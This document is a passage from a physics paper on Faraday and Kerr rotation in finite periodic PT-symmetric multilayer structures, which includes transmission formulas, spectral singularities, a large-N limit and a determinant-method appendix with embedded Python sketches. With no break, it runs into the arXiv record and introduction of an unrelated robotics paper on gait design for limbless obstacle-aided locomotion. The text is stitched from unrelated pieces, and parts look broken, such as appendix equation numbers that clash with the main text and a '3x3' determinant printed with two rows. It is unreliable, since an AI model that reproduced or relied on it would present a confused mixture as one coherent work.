at \(3\pi/2\) is related to the frequency of the spectral singularity \(\omega_{cr}=\frac{c\sqrt{n^{2}+n_{0}^{2}}}{V_{2}}\), where \(T_{0}\rightarrow\infty\). The physical reason why the frequency dependence of the Faraday rotation angle \(\theta_{1}^{T}\) has a relatively simple mathematical structure compared with the Kerr ellipticity \(\theta_{2}^{R^{r/l}}\) is that in the first case the rotation maximum is directly proportional to the optical anisotropy (for example, the larger \(n_{+}-n_{-}\), the larger is \(\theta_{1}^{T}\)). However, the maximisation of \(\theta_{2}^{R^{r/l}}\) is not so straightforward, since the anisotropy indices are mixed (see, e.g., Ref.
[32] and references therein). ## IV Periodic system with \(2N+1\) cells It is known that when wave propagation through a medium is described by a second-order differential equation, the expression for the total transmission through a finite periodic system, for any type of wave (sound or electromagnetic), depends on the unit-cell transmission, the Bloch phase and the total number of cells. As an example of a collective interference effect, let us mention the intensity distribution from \(N\) slits (diffraction due to \(N\) slits), as well as the formula that describes the Landauer resistance of a one-dimensional chain of \(N\) periodically spaced random scatterers. In both cases, the similarity of the results is obvious. However, the physics behind these results is completely different, both in spirit and in detail. In analogy with the Hermitian case, one can expect such an interference effect to hold also for a non-Hermitian Hamiltonian system. In this sense it is natural that a somewhat similar formula for the transmission and reflection amplitudes of a \(\mathcal{PT}\)-symmetric system appears, for example, in Refs. [29; 33; 34; 35]. Infinite periodic \(\mathcal{PT}\)-symmetric structures, because of their unusual properties, including the band structure, Bloch oscillations, unidirectional propagation and enhanced sensitivity, are of special interest and are presently the subject of intensive ongoing research (see, e.g., Refs. [36; 37; 38; 39] and references therein). However, the case of scattering in finite periodic systems composed of an arbitrary number of cells/scatterers has been less investigated, despite the fact that open quantum systems generally consist of a finite system coupled to an infinite environment. In many studies, the transfer matrix method is used to describe quantitatively both amplification and absorption in periodic \(\mathcal{PT}\)-symmetric systems. The latter can be reduced to the evaluation of the product of transfer matrices of complex but identical unit cells, with the final result obtained using the classical Chebyshev identity. In the following, we present the amplitudes of transmission and reflection from the left and right sides of the incident wave based on the characteristic determinant approach; the technical details are given in Appendix A. The latter, in principle, is compatible with the transfer matrix method and is convenient for both numerical and analytical calculations. ### Amplitudes of transmission and reflection from left and right We now turn to a closer investigation of the Faraday and Kerr rotations for various parameter ranges of our periodic \(\mathcal{PT}\)-symmetric system that consists of \(2N+1\) cells, see Fig. 1. Following Refs. [29; 40] (see also Appendix A), generic expressions for the transmission and left/right reflection amplitudes of the \(\mathcal{PT}\)-symmetric system can be presented as: \[t(\omega)=\frac{e^{-ik_{0}L_{0}}}{\cos(\beta(2N+1)\Lambda)+iIm\left[\frac{e^{-ik_{0}L_{0}}}{t_{0}(\omega)}\right]\frac{\sin(\beta(2N+1)\Lambda)}{\sin(\beta\Lambda)}}, \tag{24}\] where \(k_{0}=n_{0}\frac{\omega}{c}\) and \(k=n\frac{\omega}{c}\) are the wave vectors in the respective media. The quasi-momentum \(\beta\) is the Bloch wave vector of the infinite periodic system with unit cell length or spatial periodicity \(\Lambda=L_{0}+L\): \[\cos(\beta\Lambda)\equiv Re\left[\frac{e^{-ik_{0}L_{0}}}{t_{0}(\omega)}\right]=\sin(kL)\left[\cos(k_{0}L_{0})\mathcal{R}(\omega)-\sin(k_{0}L_{0})\mathcal{I}(\omega)\right].
\tag{25}\] The left/right reflection amplitude can be written in the form [29; 40] \[\frac{r^{(r/l)}(\omega)}{t(\omega)}=\left[\frac{r_{0}^{(r/l)}(\omega)}{t_{0}(\omega)}\right]\frac{\sin(\beta(2N+1)\Lambda)}{\sin(\beta\Lambda)}, \tag{26}\] where \(t_{0}(\omega)\) and \(r_{0}^{(r/l)}(\omega)\) are the transmission and reflection amplitudes for a single cell (\(N=0\)), given in Eq.(14) and Eq.(17), respectively. An important feature of expressions (24) and (26) is that both contain the factor \(\frac{\sin(\beta(2N+1)\Lambda)}{\sin(\beta\Lambda)}\), which naturally occurs in Hermitian one-dimensional finite periodic systems due to interference or diffraction effects and reflects the combined effect of all \(2N+1\) cells. The appearance of this factor in non-Hermitian systems is highly non-trivial from the viewpoint of the usual probability conservation property of Hermitian systems (the reflection and transmission coefficients must sum to unity in either the classical or the quantum mechanical regime) or of unitary scattering matrix theory. However, in Refs. [29; 33] simple closed-form expressions are obtained for the total transmission and reflection (left/right) amplitudes from a lattice of \(N\) cells. As pointed out in Ref. [29], the transmission and reflection amplitudes for a periodic many-scatterer system are related to the single-cell amplitudes in a compact fashion. This is intimately connected with the factorization of the short-range dynamics within a single cell and the long-range collective effect of the periodic structure of the entire system: the short-range interaction dynamics is described by the single-cell scattering amplitudes, while \(\beta\) represents the collective mode of the entire lattice. Such a factorization of short-range dynamics and a long-range collective mode is well known in both condensed matter physics and nuclear/hadron physics. In cases such as particles interacting with a short-range potential in a periodic box or trap, two physical scales, (1) the short-range particle dynamics and (2) the long-range geometric effect due to the periodic box or trap, are clearly separated. The quantization conditions are given by a compact formula that is known as the Korringa-Kohn-Rostoker (KKR) method [41; 42] in condensed matter physics, the Luscher formula [43] in lattice QCD, and the Busch-Englert-Rzazewski-Wilkens (BERW) formula [44] for a harmonic oscillator trap in the nuclear physics community. Other related useful discussions can be found in, e.g., Refs. [45; 46; 47; 48]. The above statement can also be demonstrated by the expression for the transmission coefficient \(T=|t|^{2}\) of the finite system with \(2N+1\) cells, \[\frac{1}{T}=1+\frac{r_{0}^{r}}{t_{0}}\frac{{r_{0}^{l}}^{*}}{{t_{0}}^{*}}\frac{\sin^{2}(\beta(2N+1)\Lambda)}{\sin^{2}(\beta\Lambda)}=1+\bigg{(}\frac{1}{T_{0}}-1\bigg{)}\frac{\sin^{2}(\beta(2N+1)\Lambda)}{\sin^{2}(\beta\Lambda)}. \tag{27}\] In addition, Equation (27) shows that there are two distinct cases for which an incident wave is totally transmitted, i.e. \(T=1\). This implies perfect resonant transmission with no losses and no gain, regardless of the complex nature of the coupling constants. The first case occurs when there is no reflected wave from any individual cell; this matches the condition that the product \(\frac{r_{0}^{r}}{t_{0}}\frac{{r_{0}^{l}}^{*}}{{t_{0}}^{*}}\) in Eq. (27) is zero (or \(T_{0}=1\)).
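Equations (24)-(27) lend themselves to direct numerical evaluation. The following sketch is our own illustration, not code from the original work: the single-cell amplitudes `t0`, `r0_r` and `r0_l` are assumed to be supplied by the user, e.g. from Eq. (14) and Eq. (17), and a complex arccosine is used so that \(\beta\) is also defined inside band gaps where \(|\cos(\beta\Lambda)|>1\):

```python
import cmath

def n_cell_amplitudes(omega, t0, r0_r, r0_l, n0, L0, Lam, N, c=1.0):
    """Transmission/reflection of 2N+1 identical cells from single-cell amplitudes, Eqs. (24)-(27)."""
    k0 = n0 * omega / c
    phase = cmath.exp(-1j * k0 * L0)
    u = phase / t0(omega)                      # e^{-i k0 L0} / t0(omega)
    beta = cmath.acos(u.real) / Lam            # Eq. (25): cos(beta*Lambda) = Re[u]
    M = 2 * N + 1
    ratio = cmath.sin(beta * M * Lam) / cmath.sin(beta * Lam)
    t = phase / (cmath.cos(beta * M * Lam) + 1j * u.imag * ratio)   # Eq. (24)
    r_r = t * (r0_r(omega) / t0(omega)) * ratio                     # Eq. (26), right reflection
    r_l = t * (r0_l(omega) / t0(omega)) * ratio                     # Eq. (26), left reflection
    return t, r_r, r_l, abs(t) ** 2            # last entry: T = |t|^2, cf. Eq. (27)
```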
This would lead to the unidirectional propagation discussed in several studies on \(\mathcal{PT}\)-symmetric systems, see, e.g., Refs. [49; 50; 51; 52]. This phenomenon is also referred to as the effect of exceptional points (EPs), which separate the broken and unbroken \(\mathcal{PT}\)-symmetric phases, see e.g. Refs. [53; 54; 55; 56]. In the second case, \(\sin(\beta(2N+1)\Lambda)/\sin(\beta\Lambda)=0\). This corresponds to constructive interference between paths reflected from different unit cells at \[\beta\Lambda=\frac{\pi l}{2N+1},\qquad|l|=1,\cdots,N. \tag{28}\] In both cases we have perfect transmission, that is, \(T=1\). As a consequence, the product of the two reflection coefficients on the left and right should vanish according to formula (9). In the case when one of the reflections reaches zero while the other remains non-zero, so-called unidirectional transparency can occur: we have ideal reflectionless transmission in one direction but not in the other. The experimental demonstration of unidirectional reflectionless propagation in a parity-time metamaterial at optical frequencies is reported in Ref. [50]. An outlook on the potential directions and applications of controlling sound in non-Hermitian acoustic systems can be found in Ref. [57]. ### Spectral singularities in a periodic system with \(2N+1\) cells To illustrate the influence of the two factors mentioned above, as well as the role of spectral singularities in the formation of the Faraday and Kerr rotations and their shapes, let us note that (i) the spectral singularities arise on the real frequency axis, i.e. at \(Im(\omega)=0\), and (ii) the location of these poles can be found by solving \(1/t(k)=0\). Based on Eq.(24), there are two types of solutions, as was mentioned above: (i) Type I singularities are given by solutions of \(\frac{1}{t_{0}(\omega)}=0\). Hence \(\cos(\beta\Lambda)=0\) and \(\frac{1}{t(\omega)}=0\) are both automatically satisfied: \[\beta\Lambda=\pi l+\frac{\pi}{2},\ \ \ \ l\in\mathbb{Z}. \tag{29}\] The type I singularities originate from a single cell (\(N=0\)) and are shared by the entire system of \(2N+1\) cells. The type I solutions are independent of the number of cells and the size of the system. A detailed discussion of type I singularities can be found in Sec. III.1. (ii) Type II singularities depend on the size of the system and are given by the two conditions \[\cos\left(\beta(2N+1)\Lambda\right)=0,\ \ \ \ Im\left[\frac{e^{-ik_{0}L_{0}}}{t_{0}(k)}\right]=0. \tag{30}\] Hence \(\beta\Lambda=\frac{\pi(l+\frac{1}{2})}{2N+1}\) with \(l\in\mathbb{Z}\), and the above two conditions are given explicitly by \[\sin\left(\frac{n\omega_{cr}}{c}L\right)\left[\cos\left(\frac{n_{0}\omega_{cr}}{c}L_{0}\right)\mathcal{R}(\omega_{cr})-\sin\left(\frac{n_{0}\omega_{cr}}{c}L_{0}\right)\mathcal{I}(\omega_{cr})\right] =\cos\frac{\pi(l+\frac{1}{2})}{2N+1},\] \[\cos\left(\frac{n_{0}\omega_{cr}}{c}L_{0}\right)\mathcal{I}(\omega_{cr})+\sin\left(\frac{n_{0}\omega_{cr}}{c}L_{0}\right)\mathcal{R}(\omega_{cr}) =0.
\tag{31}\] In the limit \(V_{1}\to 0\), the two conditions reduce to \[\frac{V_{2}^{2}\omega_{cr}^{2}}{2c^{2}nn_{0}}-\tan\left(\frac{n_{0}\omega_{cr}L_{0}}{c}\right)\cot\left(\frac{n\omega_{cr}L}{c}\right)=\frac{1}{2}\left(\frac{n_{0}}{n}+\frac{n}{n_{0}}\right),\ \ \ \cos\frac{\pi(l+\frac{1}{2})}{2N+1}=\frac{\cos\left(\frac{n\omega_{cr}L}{c}\right)}{\cos\left(\frac{n_{0}\omega_{cr}L_{0}}{c}\right)} \tag{32}\] ### Large \(N\) limit As the number of cells is increased, all FR and KR angles demonstrate fast oscillating behavior due to the \(\sin(\beta(2N+1)\Lambda)\) and \(\cos(\beta(2N+1)\Lambda)\) functions in the transmission and reflection amplitudes. This behavior is very similar to what happens for the tunneling time of a particle through layers of periodic \(\mathcal{PT}\)-symmetric barriers, as discussed in Ref. [29]. For large-\(N\) systems, we can introduce the FR and KR angles per unit cell \[\widehat{\theta}^{T/R}(\omega)=\frac{\theta^{T/R}(\omega)}{(2N+1)\Lambda}. \tag{33}\] The \(N\rightarrow\infty\) limit may be approached by adding a small imaginary part to \(\beta\): \(\beta\rightarrow\beta+i\epsilon\), where \(\epsilon\gg\frac{1}{(2N+1)\Lambda}\). As discussed in Ref. [29], adding a small imaginary part to \(\beta\) is justified by considering the averaged FR and KR angles per unit cell, which ultimately smooths out the fast oscillating behavior of the FR and KR angles. Using the asymptotic behavior \[\sec(\beta(2N+1)\Lambda)\propto 2e^{i\beta(2N+1)\Lambda},\ \ \ \ \tan(\beta(2N+1)\Lambda)\propto 1, \tag{34}\] we find \[\frac{1}{(2N+1)\Lambda}\ln t(\omega)\stackrel{{ N\rightarrow\infty}}{{\rightarrow}}i\beta,\ \ \ \ \ \frac{1}{(2N+1)\Lambda}\ln r(\omega)\stackrel{{ N\rightarrow\infty}}{{\rightarrow}}0. \tag{35}\] Therefore, as \(N\to\infty\), the FR and KR angles per unit cell approach \[\widehat{\theta}_{1}^{T}\overset{N\to\infty}{\to}-\frac{g}{2n}\frac{\partial Re[\beta]}{\partial n},\hskip 14.226378pt\widehat{\theta}_{2}^{T}\overset{N\to\infty}{\to}\frac{g}{2n}\frac{\partial Im[\beta]}{\partial n},\hskip 14.226378pt\widehat{\theta}_{1,2}^{R^{r/l}}\overset{N\to\infty}{\to}0. \tag{36}\] Note also that in the large-\(N\) limit, \[\sin(\beta(2N+1)\Lambda)\propto-\frac{1}{2i}e^{-i\beta(2N+1)\Lambda}\overset{N\to\infty}{\to}\infty, \tag{37}\] so, using Eq.(27), one can show that the transmission coefficient approaches zero: \(T\overset{N\to\infty}{\to}0\). The relation between \(\widehat{\theta}_{2}^{T}\) and \(\widehat{\theta}_{2}^{R^{r/l}}\) given in Eq.(11) hence remains valid as \(N\to\infty\). Examples of the FR and KR angles per unit cell for a \(\mathcal{PT}\)-symmetric finite system with five cells are shown in Fig. 4 and Fig. 5, compared with the large-\(N\) limit results. As we can see in Fig. 4 and Fig. 5, the \(\theta_{1}^{T}\) and \(\theta_{2}^{T}\) angles oscillate around the large-\(N\) limit results. Even for this small system, we can clearly see that the band structure of the infinite periodic system is already showing up. The oscillating KR angles are consistent with zero in the large-\(N\) limit. In addition, in the broken \(\mathcal{PT}\)-symmetric phase in Fig. 5, EPs can be visualized even for a small system, where two neighbouring bands merge and the \(\mathcal{PT}\)-symmetric system becomes totally transparent: both \(\theta_{1}^{T}\) and \(\theta_{2}^{T}\) approach zero. For a real refractive index profile, the sign of \(\theta_{1}^{T}\) is always positive due to the fact that \(\theta_{1}^{T}\) is closely related to the density of states.
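If one wishes to evaluate the large-\(N\) limits of Eq. (36) numerically, the Bloch phase of Eq. (25) can be differentiated with respect to \(n\) by a finite difference. The sketch below is our own illustration; the single-cell amplitude `t0(omega, n)` (e.g. built from Eq. (14)), the constant `g`, and the step `dn` are assumed inputs rather than quantities fixed by the text:

```python
import cmath

def bloch_beta(omega, n, t0, n0, L0, Lam, c=1.0):
    """Bloch phase beta from Eq. (25); t0(omega, n) is the single-cell transmission amplitude."""
    u = cmath.exp(-1j * n0 * omega * L0 / c) / t0(omega, n)
    return cmath.acos(u.real) / Lam

def fr_angles_per_cell(omega, n, t0, n0, L0, Lam, g, c=1.0, dn=1e-6):
    """Large-N Faraday rotation and ellipticity per unit cell, Eq. (36), via a central difference."""
    dbeta_dn = (bloch_beta(omega, n + dn, t0, n0, L0, Lam, c)
                - bloch_beta(omega, n - dn, t0, n0, L0, Lam, c)) / (2.0 * dn)
    theta1 = -(g / (2.0 * n)) * dbeta_dn.real   # per-cell Faraday rotation
    theta2 = (g / (2.0 * n)) * dbeta_dn.imag    # per-cell Faraday ellipticity
    return theta1, theta2
```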
However, in \(\mathcal{PT}\)-symmetric systems, \(\theta_{1}^{T}\) is now associated with a generalized density of states, which can be either positive or negative, see the discussion in Refs. [24; 29]. In this sense the negative spike(s) in Fig. 4 and Fig. 5 around some frequencies provide a formal justification of the existence of such negative states. The sign change of \(\theta_{1}^{T}\) is closely related to the motion of poles across the real axis, from the unphysical sheet (the second Riemann sheet) into the physical sheet (the first Riemann sheet); for more details see Refs. [29; 58]. Since \(\theta_{1}^{T}\) (\(\theta_{1}^{R}\)) is assumed to be related to the density of states, it is natural that it is practically zero in all forbidden bands and takes a giant leap to a very large value at the end of each band. ## V Discussion and Summary In summary, we studied the anomalous behavior of the Faraday (transmission) and polar Kerr (reflection) rotation angles of the propagating light in finite periodic parity-time (\(\mathcal{PT}\)) symmetric structures containing \(2N+1\) cells. We have obtained closed-form expressions for the FR and KR angles for a single cell consisting of two complex \(\delta\)-potentials placed at the boundaries of an ordinary dielectric slab. It is shown that, for a given set of parameters describing the system, a phase transition-like anomalous behavior of the Faraday and Kerr rotation angles in parity-time symmetric systems can take place. In the anomalous phase one of the Faraday and Kerr rotation angles becomes negative, and both angles are strongly enhanced near the spectral singularities. It is shown that, due to symmetry constraints, the real part of the complex angle of KR, \(\theta_{1}^{R}\), is always equal to the \(\theta_{1}^{T}\) of FR, no matter what phase the system is in. The imaginary parts of the KR angles \(\theta_{2}^{R^{r/l}}\) are also related to the \(\theta_{2}^{T}\) of FR by parity-time symmetry. We find that, in the limit of weak scattering, the Kerr and Faraday rotation angles increase linearly with the length of the system. In this approximation the effects of multiple reflections within the layers are not significant. We have also shown, based on the modified Kramers-Kronig relations, that only three of the FR and KR angles are completely independent. ###### Acknowledgements. P.G. and V.G. acknowledge support from the Department of Physics and Engineering, California State University, Bakersfield, CA. V.G., A.P-G. and E.J. would like to thank UPCT for partial financial support through the concession of "Maria Zambrano ayudas para la recualificacion del sistema universitario espanol 2021-2023" financed by the Spanish Ministry of Universities with financial funds "Next Generation" of the EU. ## Appendix A Determinant Approach This section is of a more mathematical nature. We combine two non-perturbative approaches that describe photon (electron) behaviour in a random potential sufficiently completely to study the energy spectrum and the scattering matrix elements of the \(\mathcal{PT}\) system without actually determining the photon eigenfunctions. In both approaches, the Green's function was calculated exactly for two different models. In the first model, we are dealing with a sum of \(\delta\)-potentials distributed randomly with arbitrary strengths.
The second model was used to calculate the passage of a free particle through a layered system characterized by random parameters of the layers. A convenient formalism for studying one-dimensional scattering systems satisfying the stationary Schrodinger equation, or the Helmholtz equation relevant to optical Bragg gratings, is developed in Refs. [59; 60]. The approach allows one to express the transmission and reflection amplitudes of a wave propagating in a one-dimensional random layered structure through the characteristic determinant \(D_{N}\) (\(N\) is the number of boundaries), which depends only on the reflection amplitudes of a single scatterer. The transmission amplitude \(t_{N}\) of waves through the system can be presented in the form \[t_{N}=\frac{e^{ik|x_{N}-x_{1}|}}{D_{N}^{0}}, \tag{10}\] where the characteristic determinant \(D_{N}^{0}\) reduces to a recursive equation that is convenient for both numerical and analytical approaches. This paper presents a generalization of the determinant approach to the case of \(\mathcal{PT}\)-symmetric (non-symmetric) systems consisting of \((N-1)\) dielectric multilayers with two delta potentials in each. A detailed and, in many respects, complete description and analysis of the Faraday and Kerr effects in such a system is discussed. Specifically, our investigations focus on the periodic finite-size diatomic \(\mathcal{PT}\)-symmetric model. We predict that for a given set of parameters describing the system the Faraday and Kerr rotation angles show a non-trivial transition with a change in sign. In the anomalous phase one of the Faraday and Kerr rotation angles can become negative, and both angles are strongly enhanced near the spectral singularities. Let us consider an \((N-1)\)-layer dielectric system, with layers labeled \(n=1,\cdots,N-1\), between two semi-infinite media. The positions of the boundaries of the \(n\)th dielectric layer, characterized by the constant \(\epsilon_{n}\), are given by \(x_{n}\) and \(x_{n+1}\), respectively. The left and right ends of the system are at \(x=x_{1}\) and \(x=x_{N}\), respectively, with \(\epsilon_{0}=\epsilon_{N}\). We assume that a plane EMW is incident from the left (with the dielectric permittivity \(\epsilon_{0}\)) onto the boundary at \(x=x_{1}\) and evaluate the amplitude of the reflected wave and the wave propagating in the semi-infinite medium for \(x>x_{N}\), characterized by \(\epsilon_{N}\). In the further discussion we will assume that the first and last layers of the multilayer system form interfaces with the vacuum. We also assume that we know the transmission \(t_{n,n+1}\) and reflection amplitudes (from the left \(r_{n,n+1}\) and the right \(r_{n+1,n}\)) of the EMW from a single \(Z_{n}\delta(x-x_{n})\) scatterer, located at the contact of two semi-infinite media I and II at \(x=x_{n}\). Using the transmission and reflection amplitudes for the single scatterer, we will build the characteristic determinant \(D_{N}\) for \(N\) scatterers and obtain the total transmission \(t_{N}\) and reflection amplitudes \(r_{L}^{N}\) and \(r_{R}^{N}\). The transmission amplitudes from the left and from the right are equal to each other and are given by \[t_{n,n+1}=t_{n+1,n}\equiv\frac{2\sqrt{\frac{k_{n}}{k_{n-1}}}}{1+\frac{k_{n}}{k_{n-1}}-i\frac{\gamma}{k_{n-1}}Z_{n}},\hskip 14.226378ptk_{n}=\frac{\omega}{c}n,\hskip 14.226378pt\gamma\equiv\left(\frac{\omega}{c}\right)^{2}.
\tag{14}\] Similarly, \[r_{n,n+1}=\frac{1-\frac{k_{n+1}}{k_{n}}+i\frac{\gamma}{k_{n}}Z_{n}}{1+\frac{k_{n+1}}{k_{n}}-i\frac{\gamma}{k_{n}}Z_{n}},\hskip 14.226378ptr_{n+1,n}=\frac{\frac{k_{n+1}}{k_{n}}-1+i\frac{\gamma}{k_{n}}Z_{n}}{1+\frac{k_{n+1}}{k_{n}}-i\frac{\gamma}{k_{n}}Z_{n}}. \tag{15}\] We can easily verify by using Eq.(14) and Eq.(15) that the conservation law is satisfied, provided that \(Z_{n}\) is real: \[t_{n,n+1}t_{n,n+1}^{*}+r_{n,n+1}r_{n,n+1}^{*}=\frac{4\frac{k_{n}}{k_{n-1}}+(1-\frac{k_{n}}{k_{n-1}})^{2}+(\frac{\gamma}{k_{n-1}}Z_{n})^{2}}{(1+\frac{k_{n}}{k_{n-1}})^{2}+(\frac{\gamma}{k_{n-1}}Z_{n})^{2}}=1 \tag{16}\] In the case of a complex value of \(Z_{n}\), the conservation law cannot hold, since the system is not \(\mathcal{PT}\)-symmetric and can only be described by complex energy eigenvalues. Later, when we "build" the characteristic determinant \(D_{N}\) for the entire system with \(N\) complex potentials, distributed arbitrarily, we will return to the conservation law of the system in more detail. Assuming that we know the explicit expression for the amplitude of reflection from a single-scattering delta potential, see Eq.(15), we now turn to a closer investigation of the system with two complex potentials. Following Ref. [59], we can present the determinant \(D_{2}\) of two delta potentials located at points \(x_{1}\) and \(x_{2}\) (\(L=x_{2}-x_{1}\)) on the left and right boundaries of a dielectric slab surrounded by two semi-infinite media with permittivities \(\epsilon_{0}\) (left) and \(\epsilon_{2}\) (right), respectively. The dielectric slab itself is characterized by permittivity \(\epsilon_{1}\). The explicit form of \(D_{2}\) is \[D_{2}^{0}=\frac{1}{(1+r_{21})(1+r_{32})}\det D_{2}, \tag{17}\] where \[\det D_{2}\equiv\left|\begin{matrix}1&r_{23}e^{ik_{1}(x_{2}-x_{1})}\\ r_{21}e^{ik_{1}(x_{2}-x_{1})}&1\end{matrix}\right|, \tag{18}\] and \(r_{n,n+1}\) is given by Eq.(15) with the appropriate choice of \(n\) and \(Z_{n}\). Let us add another boundary from the right, at the point \(x_{3}\), i.e. we consider a layered heterostructure consisting of two films with permittivities \(\epsilon_{1}\) and \(\epsilon_{2}\), placed between two semi-infinite media \(\epsilon_{0}\) and \(\epsilon_{3}\). Next, adding another complex delta potential \(Z_{3}\) at \(x_{3}\), the new \(D_{3}\), which is now a \(3\times 3\) determinant, can be written as \[D_{3}^{0}=\prod_{l=1}^{3}\frac{1}{(1+r_{l+1,l})}\det D_{3} \tag{19}\] where \[\det D_{3}\equiv\left|\begin{matrix}1&r_{23}e^{ik_{1}(x_{2}-x_{1})}&r_{34}e^{ik_{1}(x_{2}-x_{1})}e^{ik_{2}(x_{3}-x_{2})}\\ r_{21}e^{ik_{1}(x_{2}-x_{1})}e^{ik_{2}(x_{3}-x_{2})}&r_{32}e^{ik_{2}(x_{3}-x_{2})}&1\end{matrix}\right|. \tag{20}\] By continuing to add new boundaries and complex potentials \(Z_{n}\) at the points \(x_{4},\ldots,x_{N}\), we obtain an \(N\)-multilayer system, each layer of which contains two delta potentials. This system is characterized by the \(N\times N\) determinant \(D_{N}\), \[D_{N}^{0}=\prod_{l=1}^{N}\frac{1}{(1+r_{l+1,l})}\det D_{l,n}^{N}, \tag{21}\] with the following matrix elements \(D_{l,n}^{N}\): \[D_{l,n}^{N}=\left\{\begin{array}{ll}\delta_{ln}+(1-\delta_{ln})r_{l,l-1}e^{ik_{l}|x_{l}-x_{n}|},&l\geq n,\\ \delta_{ln}+(1-\delta_{ln})r_{l-1,l}e^{ik_{l}|x_{l}-x_{n}|},&n\geq l.\end{array}\right.
\tag{22}\] The characteristic determinant \(D_{N}\) can be presented as a determinant of a Toeplitz tridiagonal matrix that satisfies the following recurrence relationship: \[D_{N}=A_{N}D_{N-1}-B_{N}D_{N-2},\] where \(D_{N-1}\) (\(D_{N-2}\)) is the determinant built from the matrix elements in Eq. (22) with the \(N\)th (and also the \((N-1)\)th) row and column omitted. The initial conditions for the recurrence relations are \(D_{0}=1\), \(D_{-1}=0\), \(D_{1}\equiv A_{1}=1\). The coefficients \(A_{N}\), \(B_{N}\) can be obtained from the explicit form of \(D_{n,l}^{N}\) (see Eq. (22)). For \(N>1\) we have \[A_{n}=1+\frac{r_{n,n+1}}{r_{n-1,n}}(1+r_{n-1,n}+r_{n,n-1})e^{2ik_{n}|x_{n}-x_{n-1}|}=1+B_{n}-r_{n,n-1}r_{n,n+1}e^{2ik_{n}|x_{n}-x_{n-1}|}\] and \[B_{n}=\frac{r_{n,n+1}}{r_{n-1,n}}(1+r_{n,n-1})(1+r_{n-1,n})e^{2ik_{n}|x_{n}-x_{n-1}|}.\] In conclusion, let us stress once more that the equations above may be viewed as a generalization of the characteristic determinant method that can be applied to the Helmholtz (Schrodinger) equation with arbitrarily distributed complex potentials, in order to find the scattering matrix elements without actually determining the photon (electron) eigenfunctions.
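The recurrence above translates directly into a few lines of code. The following sketch is our own illustration, not part of the original appendix; the single-boundary reflection amplitudes `r[(i, j)]`, the wave vectors `k[n]` and the boundary positions `x[n]` are assumed to be supplied (e.g. from Eq. (15)), and the total transmission then follows from Eq. (10) once the prefactor \(\prod_{l}(1+r_{l+1,l})^{-1}\) of Eq. (21) is included:

```python
import cmath

def characteristic_determinant(r, k, x, N):
    """D_N from the recursion D_N = A_N D_{N-1} - B_N D_{N-2}, with A_n, B_n as defined above.

    Containers use the text's 1-based boundary index n = 1..N; r is a dict keyed by (i, j)."""
    D = {-1: 0j, 0: 1 + 0j, 1: 1 + 0j}           # initial conditions: D_{-1}=0, D_0=1, D_1=A_1=1
    for n in range(2, N + 1):
        phase = cmath.exp(2j * k[n] * abs(x[n] - x[n - 1]))
        B = (r[(n, n + 1)] / r[(n - 1, n)]) * (1 + r[(n, n - 1)]) * (1 + r[(n - 1, n)]) * phase
        A = 1 + B - r[(n, n - 1)] * r[(n, n + 1)] * phase
        D[n] = A * D[n - 1] - B * D[n - 2]
    return D[N]
```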
2302.06561
Gait design for limbless obstacle aided locomotion using geometric mechanics
Limbless robots have the potential to maneuver through cluttered environments that conventional robots cannot traverse. As illustrated in their biological counterparts such as snakes and nematodes, limbless locomotors can benefit from interactions with obstacles, yet such obstacle-aided locomotion (OAL) requires properly coordinated high-level self-deformation patterns (gait templates) as well as low-level body adaptation to environments. Most prior work on OAL utilized stereotyped traveling-wave gait templates and relied on local body deformations (e.g., passive body mechanics or decentralized controller parameter adaptation based on force feedback) for obstacle navigation, while gait template design for OAL remains less studied. In this paper, we explore novel gait templates for OAL based on tools derived from geometric mechanics (GM), which thus far has been limited to homogeneous environments. Here, we expand the scope of GM to obstacle-rich environments. Specifically, we establish a model that maps the presence of an obstacle to directional constraints in optimization. In doing so, we identify novel gait templates suitable for sparsely and densely distributed obstacle-rich environments respectively. Open-loop robophysical experiments verify the effectiveness of our identified OAL gaits in obstacle-rich environments. We posit that when such OAL gait templates are augmented with appropriate sensing and feedback controls, limbless locomotors will gain robust function in obstacle rich environments.
Baxi Chong, Tianyu Wang, Daniel Irvine, Velin Kojouharov, Bo Lin, Howie Choset, Daniel I. Goldman, Grigoriy Blekherman
2023-02-13T18:06:06Z
http://arxiv.org/abs/2302.06561v1
# Gait design for limbless obstacle aided locomotion using geometric mechanics ###### Abstract Limbless robots have the potential to maneuver through cluttered environments that conventional robots cannot traverse. As illustrated in their biological counterparts such as snakes and nematodes, limbless locomotors can benefit from interactions with obstacles, yet such obstacle-aided locomotion (OAL) requires properly coordinated high-level self-deformation patterns (gait templates) as well as low-level body adaptation to environments. Most prior work on OAL utilized stereotyped traveling-wave gait templates and relied on local body deformations (e.g., passive body mechanics or decentralized controller parameter adaptation based on force feedback) for obstacle navigation, while gait template design for OAL remains less studied. In this paper, we explore novel gait templates for OAL based on tools derived from geometric mechanics (GM), which thus far has been limited to homogeneous environments. Here, we expand the scope of GM to obstacle-rich environments. Specifically, we establish a model that maps the presence of an obstacle to directional constraints in optimization. In doing so, we identify novel gait templates suitable for sparsely and densely distributed obstacle-rich environments respectively. Open-loop robophysical experiments verify the effectiveness of our identified OAL gaits in obstacle-rich environments. We posit that when such OAL gait templates are augmented with appropriate sensing and feedback controls, limbless locomotors will gain robust function in obstacle rich environments. ## I Introduction Elongate limbless locomotors have advantages in navigating cluttered and confined spaces. For instance, adaptation to cluttered environments is believed to be a source of evolutionary pressure for limblessness in Squamates (lizards and snakes) [30, 35]. In order to move through such cluttered environments, these animals had evolved the capability to push off their surroundings to locomote. This is commonly known as obstacle-aided locomotion (OAL) [19, 23, 17]. Moreover, many biological limbless locomotors can have higher speeds with OAL than in obstacle-free environments [23, 17] while legged locomotors often slow down as heterogeneity increases [36, 7, 28, 10]. Unfortunately, it is still challenging for elongated limbless robots to approach the performance of their biological counterparts displayed in OAL. To replicate the successful biological OAL in robotic/artificial counterparts, prior work has considered OAL in robotic applications. Transeth et al. [37] built physical models of robot-obstacle interactions, and made quantitative predictions of robot locomotion in obstacle-rich environments. Liljeback et al. [19] noted that the interactions between robots and obstacles are only useful when the force from the obstacle to robots aligns with the desired direction of motion. Specifically the "beneficial obstacle" and "detrimental obstacle" are distinguished based on their configuration relative to the robot. Recently, compliant control (shape-based compliance) was also introduced to improve the performance of limbless robots among obstacles [38, 40, 41]. As suggested in prior work, gait template design1 is crucial to the performance of limbless locomotors [11, 25, 6]. Appropriate gait templates can greatly simplify the control/adaptation of robots especially in heterogeneous environments [9, 16, 27, 2, 6]. 
